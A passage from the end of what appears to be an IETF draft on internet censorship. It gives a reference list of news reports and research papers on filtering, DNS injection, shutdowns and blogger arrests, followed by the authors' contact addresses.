"Turkish Internet Censorship Takes a New Turn", 793 March 2014, 794 . 796 [31] Zmijewki, E., "Turkish Internet Censorship Takes a New Turn", 797 March 2014, 798 . 800 [32] AFP, ., "China Has Massive Internet Breakdown Reportedly 801 Caused By Their Own Censoring Tools", January 2014, . 806 [33] Anonymous, A., "The Collateral Damage of Internet Censorship by 807 DNS Injection", July 2012 , . 810 [34] Albert, K., "DNS Tampering and the new ICANN gTLD Rules", 811 June 2011, . 814 [35] Anonymous, A., "Denial of Service Attacks (Wikipedia)"", N/A 815 N/A, . 818 [36] Esposito, S., "Snowden Docs Show UK Spies Attacked Anonymous, 819 Hackers", February 2014, . 824 [37] CMU, ., "TCP SYN Flooding and IP Spoofing Attacks", 825 November 2000, 826 . 828 [38] Villeneuve, N., "Open Access: Chapter 8, Control and 829 Resistance, Attacks on Burmese Opposition Media", December 2011 830 , . 833 [39] Kravtsova, Y., "Cyberattacks Disrupt Opposition's Election", 834 October 2012, . 837 [40] Orion, E., "Zimbabwe election hit by hacking and DDoS attacks", 838 August 2013, . 841 [41] Muncaster, P., "Malaysian election sparks web blocking/DDoS 842 claims", May 2013, . 845 [42] Dobie, M., "Junta tightens media screw", September 2007, 846 . 848 [43] Heacock, R., "China Shuts Down Internet in Xinjiang Region 849 After Riots", July 2009, . 852 [44] Cowie, J., "Egypt Leaves the Internet", January 2011, 853 . 855 [45] Cowie, J., "Libyan Disconnect", February 2011, 856 . 858 [46] Thomson, I., "Syria Cuts off Internet and Mobile 859 Communication", November 2012, . 862 [47] News, B., "China employs two million microblog monitors state 863 media say", October 2013, 864 . 866 [48] Calamur, K., "Prominent Egyptian Blogger Arrested", 867 November 2013, . 870 [49] Press, A., "Sattar Beheshit, Iranian Blogger, Was Beaten In 871 Prison According To Prosecutor", December 2012, . 875 [50] Hopkins, C., "Communications Blocked in Libya, Qatari Blogger 876 Arrested: This Week in Online Tyranny", March 2011, . 880 [51] Gaurdian, T., "Chinese blogger jailed under crackdown on 881 'internet rumours'", April 2014, . 885 [52] Johnson, L., "Torture feared in arrest of Iraqi blogger", 886 Febuary 2010, . 889 [53] Bristow, M., "China's internet 'spin doctors'", November 2013, 890 . 892 [54] Fareed, M., "China joins a turf war", September 2008, . 896 [55] Gao, H., "Tiananmen, Forgotten", June 2014, . 899 [56] Anderson, R., "Access Denied: Tools and Technology of Internet 900 Filtering", December 2011 , . 903 [57] Murdoch, S., "Access Denied: Tools and Technology of Internet 904 Filtering", December 2011 , . 907 [58] Verkamp, J. and M. Gupta, "Inferring Mechanics of Web 908 Censorship Around the World", August 2012, . 912 [59] Nabi, Z., "The Anatomy of Web Censorship in Pakistan", 913 August 2013, . 918 [60] Aryan, S., Aryan, H., and J. Halderman, "Internet Censorship in 919 Iran: A First Look", August 2012, . 924 [61] Jones, B., "Automated Detection and Fingerprinting of 925 Censorship Block Pages", November 2014, 926 . 928 [62] Rushe, D., "Bing censoring Chinese language search results for 929 users in the US", February 2015, . 933 [63] Senft, A., "Asia Chats: Analyzing Information Controls and 934 Privacy in Asian Messaging Applications", November 2013, . 939 [64] Clayton, R., "Ignoring the Great Firewall of China", 940 January 2006, 941 . 943 [65] Anonymous, A., "Towards a Comprehensive Picture of the Great 944 Firewall's DNS Censorship", August 2014, . 948 [66] Khattak, S., "Towards Illuminating a Censorship Monitor's Model 949 to Facilitate Evasion", August 2013, . 954 Authors' Addresses 956 Joseph L. Hall 957 CDT 959 Email: jhall@cdt.org 961 Michael D. Aaron 962 CU Boulder 964 Email: michael.aaron@colorado.edu 966 Ben Jones 967 GA Tech 969 Email: bjones99@gatech.edu